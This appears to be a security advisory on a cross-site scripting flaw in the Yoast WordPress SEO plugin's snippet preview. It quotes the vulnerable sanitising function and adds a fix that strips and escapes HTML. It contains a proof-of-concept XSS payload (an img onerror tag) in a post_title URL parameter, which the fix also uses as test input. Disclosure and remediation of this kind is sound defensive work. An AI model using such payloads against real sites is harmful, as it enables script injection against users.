The “snippet preview” functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2.
Vulnerable URL:
/wp-admin/post-new.php?post_title=<img src=x onerror=alert(1)>
Vulnerable Code (wordpress-seo/js/wp-seo-metabox.js):
function yst_clean(str) {
    if (str == '' || str == undefined)
        return '';
    try {
        str = jQuery('<div/>').html(str).text();
        str = str.replace(/<\/?[^>]+>/gi, '');
        str = str.replace(/\[(.+?)\](.+?\[\/\\1\])?/g, '');
    } catch (e) {
    }
    return str;
}
Link: https://github.com/Yoast/wordpress-seo/blob/2.1.1/js/wp-seo-metabox.js#L1-13
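An added example (not from the original advisory or the Yoast code base) of cleaning the title without handing it to an HTML parser, since `jQuery('<div/>').html(str)` builds DOM nodes from the input before any tag is removed. The function names `stripMarkup`, `escapeHtml` and `previewTitleHtml` are hypothetical, and the sample titles other than the payload shown above are constructed.

```javascript
// Added example, not Yoast's code. All function names are hypothetical.

// Remove tags and shortcodes with string operations only.
// The input is never parsed as HTML, so no element (and no event
// handler attribute) is ever instantiated from it.
function stripMarkup(str) {
  if (str === undefined || str === null || str === '') {
    return '';
  }
  return String(str)
    // Complete tags such as <img ...> or </b>; a bare "<" in text is kept.
    .replace(/<\/?[a-z!][^>]*>/gi, '')
    // Shortcodes: [name attrs] and, when present, content up to [/name].
    .replace(/\[(\w+)[^\]]*\](?:[\s\S]*?\[\/\1\])?/g, '');
}

const ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;'
};

// Encode every HTML metacharacter so the result is inert in element
// content and in quoted attribute values.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Strip first, then escape. Escaping is what keeps the preview safe when
// the tag-stripping regex misses something, e.g. a tag with no closing ">".
function previewTitleHtml(rawTitle) {
  return escapeHtml(stripMarkup(rawTitle));
}

// Constructed sample titles, plus the post_title payload from the advisory.
const samples = [
  '<img src=x onerror=alert(1)>',
  'My post <img src=x onerror=alert(1)',
  'Price < 10 & rising',
  'Hello [b]bold[/b] world'
];
for (const title of samples) {
  console.log(JSON.stringify(title), '->', JSON.stringify(previewTitleHtml(title)));
}
```

In a browser, assigning the unescaped result of `stripMarkup` through `textContent` (or jQuery's `.text(value)`) gives the same protection as `escapeHtml` followed by an HTML insert.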